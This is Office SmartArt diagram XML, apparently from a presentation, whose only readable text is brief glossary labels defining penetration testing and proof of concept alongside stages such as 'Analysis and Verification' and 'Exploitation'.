    <dgm:cxn modelId="{0CA0F825-3943-462C-A2C4-CB031B3B88FF}" srcId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" destId="{86DBD3B5-90C1-4F10-B2ED-EE71CA011DD2}" srcOrd="2" destOrd="0" parTransId="{23AA047A-7E69-4E74-AD35-502AFCF479B9}" sibTransId="{D0D44505-9A3F-40C8-AAB3-5D8817DB028B}"/>
    <dgm:cxn modelId="{CCE3282E-5FC2-42A5-AFD5-8AA5056013C0}" type="presOf" srcId="{406622DF-9939-4D17-9B9E-DF0B4A1D09D1}" destId="{57E9720B-0829-4B08-AC67-6151DD908588}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{75CDE537-BD0B-4D62-9A64-1DB7DADEC759}" type="presOf" srcId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" destId="{3DF0B4F8-4B35-45E9-BCC7-C2DFC4E82F4B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{15FEF640-DBB1-43AE-A35D-8C880B07D6E3}" type="presOf" srcId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" destId="{E052CEF5-FB42-453B-8728-D0CFC7487997}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{12582565-4074-43D6-A914-0E1D58D9B514}" srcId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" destId="{54C92CCD-50CF-47A2-9764-D271E3D13047}" srcOrd="0" destOrd="0" parTransId="{08114566-4167-4E33-B231-7FF153134FDD}" sibTransId="{3476ABED-C5E1-43FE-823A-B58ABC43E617}"/>
    <dgm:cxn modelId="{80895666-D8A7-4B05-B013-9D04118A5AF3}" srcId="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" destId="{4D5EAA21-E405-42C2-94E8-F4271CA61841}" srcOrd="0" destOrd="0" parTransId="{A84EAA74-D198-4957-BD64-4B498B27E664}" sibTransId="{9D3A10F3-E7F7-4B95-A2A8-C98288E45A4E}"/>
    <dgm:cxn modelId="{E1CAFE67-7568-44BD-B9C1-054B7F0C2FD3}" srcId="{515F3A0A-40C0-4605-B7DF-883323947D86}" destId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" srcOrd="1" destOrd="0" parTransId="{E24ADC09-A5FF-4860-8BA4-53310D9DEDF9}" sibTransId="{A6502F06-3CF6-44DA-B43D-F1BEED6D2169}"/>
    <dgm:cxn modelId="{F230F369-9313-495A-8B59-994077A24EE4}" srcId="{515F3A0A-40C0-4605-B7DF-883323947D86}" destId="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" srcOrd="0" destOrd="0" parTransId="{87815049-65B4-4403-9C07-F77485FE1820}" sibTransId="{833A5526-2DE4-434E-A200-E4DD0F1A74E5}"/>
    <dgm:cxn modelId="{D05A278A-3C8C-47FD-8F9D-AAAF894D7D63}" type="presOf" srcId="{863E0315-036A-4956-9CB3-B1A2E3BE2971}" destId="{F633FE13-E954-482B-9409-8AE8B5800A60}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{4BDF8792-FA31-4AA7-8536-D7E00765B022}" type="presOf" srcId="{54C92CCD-50CF-47A2-9764-D271E3D13047}" destId="{3027C50A-40FC-4FEB-B8A9-9DB283F47522}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{EAFF8D99-79D3-42F4-82B8-D7755F5E4AB8}" type="presOf" srcId="{4D5EAA21-E405-42C2-94E8-F4271CA61841}" destId="{1C5DB53E-95D1-42B1-AA3C-6A1E4024C870}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F28CF1A0-A7A8-421A-9DAC-899852CA6392}" type="presOf" srcId="{F87B42A6-1858-45C0-BB19-BB93C7684F34}" destId="{6E889B6F-33F1-4FDA-95B1-A25C2B88830B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{556605D2-7335-45FB-A303-48623A773973}" srcId="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" destId="{F87B42A6-1858-45C0-BB19-BB93C7684F34}" srcOrd="1" destOrd="0" parTransId="{61800997-A18F-4809-BE87-81283D7183DB}" sibTransId="{3D28D171-767C-44E6-A250-6B3C96364151}"/>
    <dgm:cxn modelId="{F4EEA3ED-A7B0-48EE-BE8F-F16626F010C6}" type="presOf" srcId="{515F3A0A-40C0-4605-B7DF-883323947D86}" destId="{E47A2C7E-A214-4779-A6E4-4A84B35218CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{469062F3-71B7-4320-BDCC-89A77E2E2887}" type="presOf" srcId="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" destId="{15C67451-F852-416D-B536-9AF2C3BEFFA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F5BE6EF6-3605-4043-8358-69871880F63E}" srcId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" destId="{406622DF-9939-4D17-9B9E-DF0B4A1D09D1}" srcOrd="3" destOrd="0" parTransId="{839CFCD6-14F0-4943-8113-C2BF18ACBA8C}" sibTransId="{40DBF7FD-BDDD-4866-82C7-F58DEF2011BA}"/>
    <dgm:cxn modelId="{224BBFF8-59FF-4B75-9947-C13A046A5D31}" type="presOf" srcId="{86DBD3B5-90C1-4F10-B2ED-EE71CA011DD2}" destId="{48E3FBAF-4C73-4F98-B92D-687663F466E9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{39E3FCFC-DC68-47DB-9954-BC9E7A63E94C}" type="presOf" srcId="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" destId="{83573091-3D12-4EF2-81F5-5368F43F2A7B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D8293FE3-3D47-4B6E-A376-5C0342291253}" type="presParOf" srcId="{E47A2C7E-A214-4779-A6E4-4A84B35218CD}" destId="{7CE07F30-40A7-4FA3-B81B-C4E5EB17283F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{62AE3CAE-4A9E-4CBE-ADE9-2773483D68C0}" type="presParOf" srcId="{7CE07F30-40A7-4FA3-B81B-C4E5EB17283F}" destId="{15C67451-F852-416D-B536-9AF2C3BEFFA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{B1B8D922-12FE-4547-A4FA-F418383D45A7}" type="presParOf" srcId="{7CE07F30-40A7-4FA3-B81B-C4E5EB17283F}" destId="{83573091-3D12-4EF2-81F5-5368F43F2A7B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{C8389745-8A50-4F0F-9A57-3287C17C162A}" type="presParOf" srcId="{7CE07F30-40A7-4FA3-B81B-C4E5EB17283F}" destId="{BAF22914-1FC6-462F-BC61-349E9771BFF7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{7D1B5CB7-7301-4FB3-9255-C4B5521DCF71}" type="presParOf" srcId="{BAF22914-1FC6-462F-BC61-349E9771BFF7}" destId="{A32E734A-7850-4A87-8BD8-81F24492EEC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{AA547DB8-C2B3-4B4F-A93F-A9AA2495BC91}" type="presParOf" srcId="{A32E734A-7850-4A87-8BD8-81F24492EEC5}" destId="{1C5DB53E-95D1-42B1-AA3C-6A1E4024C870}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{B51797FA-435B-45F1-98CB-B5B02FFAC498}" type="presParOf" srcId="{A32E734A-7850-4A87-8BD8-81F24492EEC5}" destId="{7367F9EB-A45E-4B08-B696-915FFE94E460}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A22D53EC-E3C2-4E8A-9325-0155309913F5}" type="presParOf" srcId="{A32E734A-7850-4A87-8BD8-81F24492EEC5}" destId="{6E889B6F-33F1-4FDA-95B1-A25C2B88830B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{0B105184-1D39-4E54-B3AC-4DB3547D637F}" type="presParOf" srcId="{E47A2C7E-A214-4779-A6E4-4A84B35218CD}" destId="{C42BCC90-9EE1-42D2-98A5-FE3530B1A068}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{B4E4F934-6916-4554-87FC-30E209A4E14D}" type="presParOf" srcId="{E47A2C7E-A214-4779-A6E4-4A84B35218CD}" destId="{24F65306-35EC-4C88-AE15-6C3FB50AC939}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{CA0A8314-2279-4A52-B5F2-A8E0F962750E}" type="presParOf" srcId="{24F65306-35EC-4C88-AE15-6C3FB50AC939}" destId="{3DF0B4F8-4B35-45E9-BCC7-C2DFC4E82F4B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{85B4175B-49BE-42BE-B3E9-394B26E37BE3}" type="presParOf" srcId="{24F65306-35EC-4C88-AE15-6C3FB50AC939}" destId="{E052CEF5-FB42-453B-8728-D0CFC7487997}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{222DDB65-06E5-41DA-9585-41DA34EEC6A7}" type="presParOf" srcId="{24F65306-35EC-4C88-AE15-6C3FB50AC939}" destId="{D1676439-6A2E-4F5A-8A09-AED258D8ABDB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D976C8E8-107F-46C4-AB92-503723DDF66B}" type="presParOf" srcId="{D1676439-6A2E-4F5A-8A09-AED258D8ABDB}" destId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{74700F5A-07AE-4491-8E36-218509FCFA68}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{3027C50A-40FC-4FEB-B8A9-9DB283F47522}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{380ABA21-29A0-47D7-9540-8B97BCBA6E66}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{BAA92624-C2D4-4BDF-BFD5-AEAFF8BC5404}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D0250228-0DFE-482E-A928-C9BC83FD364F}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{F633FE13-E954-482B-9409-8AE8B5800A60}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{CC770722-B372-4422-B606-EB1DD50E01E2}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{CEFACD33-24AB-436C-B30F-EE8F6078FB0F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D74A3ED2-37E5-4ABD-9AB0-8FCFCF7C98EC}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{48E3FBAF-4C73-4F98-B92D-687663F466E9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{91429D15-EF98-4D34-844D-8FCC50E7A55A}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{D1CF66EA-0A26-4345-9A76-7462840FC196}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{64388B20-F6CC-48C4-939A-5075556CC4E4}" type="presParOf" srcId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" destId="{57E9720B-0829-4B08-AC67-6151DD908588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7F138A-2C4D-489A-8051-DAD46185B556}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful3" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7B29033-8268-4A93-AFFD-3CDF696721C2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254F7C99-6FD4-481D-843F-C67E3896017C}" type="parTrans" cxnId="{CEF1B0D2-15AF-45BB-9F69-7D4CB63A1415}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E48FFFC7-7CCD-4D74-BA0D-6D6503096438}" type="sibTrans" cxnId="{CEF1B0D2-15AF-45BB-9F69-7D4CB63A1415}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Analysis and Verification</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{383B401F-3F6C-4F14-BF2D-A30B6E60498B}" type="parTrans" cxnId="{0D36BAD9-C0A7-436F-86DA-59F211B8FE33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73EE58CF-D230-44CD-97A0-FBFE83275AA4}" type="sibTrans" cxnId="{0D36BAD9-C0A7-436F-86DA-59F211B8FE33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>illegal </a:t>
          </a:r>
          <a:r>
            <a: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rPr>
            <a:t>Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{120A541B-D76D-4393-9D07-CF0DB3197D4C}" type="parTrans" cxnId="{3929EA20-4C3A-4ED1-93F7-014EBD3C2D9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A239001F-66D7-42C8-B84A-056F2F7FE4E5}" type="sibTrans" cxnId="{3929EA20-4C3A-4ED1-93F7-014EBD3C2D9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" type="pres">
      <dgm:prSet presAssocID="{777F138A-2C4D-489A-8051-DAD46185B556}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" type="pres">
      <dgm:prSet presAssocID="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E061137-81B2-4ECE-AB25-522714A6B5C0}" type="pres">
      <dgm:prSet presAssocID="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" presName="bgChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CA41862D-8759-499E-BE04-DD513795BC59}" type="pres">
      <dgm:prSet presAssocID="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82A84D0B-04AC-4DCD-8A5F-5B1A4728DD8D}" type="pres">
      <dgm:prSet presAssocID="{E48FFFC7-7CCD-4D74-BA0D-6D6503096438}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" type="pres">
      <dgm:prSet presAssocID="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}" type="pres">
      <dgm:prSet presAssocID="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" presName="bgChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" type="pres">
      <dgm:prSet presAssocID="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDDC9E00-19C7-4546-B627-C59745F626D3}" type="pres">
      <dgm:prSet presAssocID="{73EE58CF-D230-44CD-97A0-FBFE83275AA4}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" type="pres">
      <dgm:prSet presAssocID="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F5DBD06F-6BAC-402A-B9AF-DA3C8E626C6F}" type="pres">
      <dgm:prSet presAssocID="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" presName="bgChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8D87454-8007-4B52-B763-2E00EBDEE85D}" type="pres">
      <dgm:prSet presAssocID="{E2129DD3-283F-4B32-89AA-13BE9F18EA46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65260804-2217-4EF0-A336-5D5AD0C8F458}" type="presOf" srcId="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" destId="{D8D87454-8007-4B52-B763-2E00EBDEE85D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{3929EA20-4C3A-4ED1-93F7-014EBD3C2D9F}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" srcOrd="2" destOrd="0" parTransId="{120A541B-D76D-4393-9D07-CF0DB3197D4C}" sibTransId="{A239001F-66D7-42C8-B84A-056F2F7FE4E5}"/>
    <dgm:cxn modelId="{044F706A-F633-4824-B14A-5B8C05AA57C7}" type="presOf" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{17A875B3-00FE-4FA6-95DF-8C82884652B2}" type="presOf" srcId="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" destId="{CA41862D-8759-499E-BE04-DD513795BC59}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7380E0CD-D1F5-4F0E-AF3E-F40F8B4856EE}" type="presOf" srcId="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" destId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{CEF1B0D2-15AF-45BB-9F69-7D4CB63A1415}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" srcOrd="0" destOrd="0" parTransId="{254F7C99-6FD4-481D-843F-C67E3896017C}" sibTransId="{E48FFFC7-7CCD-4D74-BA0D-6D6503096438}"/>
    <dgm:cxn modelId="{0D36BAD9-C0A7-436F-86DA-59F211B8FE33}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" srcOrd="1" destOrd="0" parTransId="{383B401F-3F6C-4F14-BF2D-A30B6E60498B}" sibTransId="{73EE58CF-D230-44CD-97A0-FBFE83275AA4}"/>
    <dgm:cxn modelId="{F411D850-9376-47ED-B352-D816746A5B86}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{33750691-16C4-4D1C-B07B-13032B59B2E4}" type="presParOf" srcId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" destId="{9E061137-81B2-4ECE-AB25-522714A6B5C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0A834B21-1FEC-40A9-85E8-840865BCF208}" type="presParOf" srcId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" destId="{CA41862D-8759-499E-BE04-DD513795BC59}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A7FA9D6A-9C36-40A1-9A6B-3259C5FA9936}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{82A84D0B-04AC-4DCD-8A5F-5B1A4728DD8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D3D5A5BA-A019-40E1-BD12-32BB7CB37B8A}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{B83C724A-CF05-48A2-B88E-B62004C737FA}" type="presParOf" srcId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" destId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{9A873427-AA01-44DD-8578-C351508D91D8}" type="presParOf" srcId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" destId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2DD2A9C4-2AA5-4E82-B646-1A29E83488B3}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FDDC9E00-19C7-4546-B627-C59745F626D3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5E43B8C1-3C6B-4CF3-B230-F8F410C81677}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{81FF06D8-6E8F-4285-BAA6-F80037C5F57E}" type="presParOf" srcId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" destId="{F5DBD06F-6BAC-402A-B9AF-DA3C8E626C6F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D9EB04EB-F7BD-4159-B35B-DE01FB80344B}" type="presParOf" srcId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" destId="{D8D87454-8007-4B52-B763-2E00EBDEE8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A04E3-FDFF-453B-96A6-23A4F5C52E84}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="248146"/>
          <a:ext cx="763128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273" tIns="333248" rIns="5922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Penetration Testing </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>Assessing the security of computer systems, networks, or applications by simulating attacker techniques</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="248146"/>
        <a:ext cx="7631289" cy="882000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="381564" y="11986"/>
          <a:ext cx="175177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11" tIns="0" rIns="20191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Pen test</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="404621" y="35043"/>
        <a:ext cx="1705656" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1452706"/>
          <a:ext cx="7631289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273" tIns="333248" rIns="5922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Proof of Concept </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>A demonstration or evidence showing that a particular vulnerability or issue exists, often in the form of a simple prototype or test.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1452706"/>
        <a:ext cx="7631289" cy="1083600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{86B53AC1-73D6-428A-BFA1-7CBFF24D431D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="381564" y="1216546"/>
          <a:ext cx="175177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11" tIns="0" rIns="20191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POC</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="404621" y="1239603"/>
        <a:ext cx="1705656" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
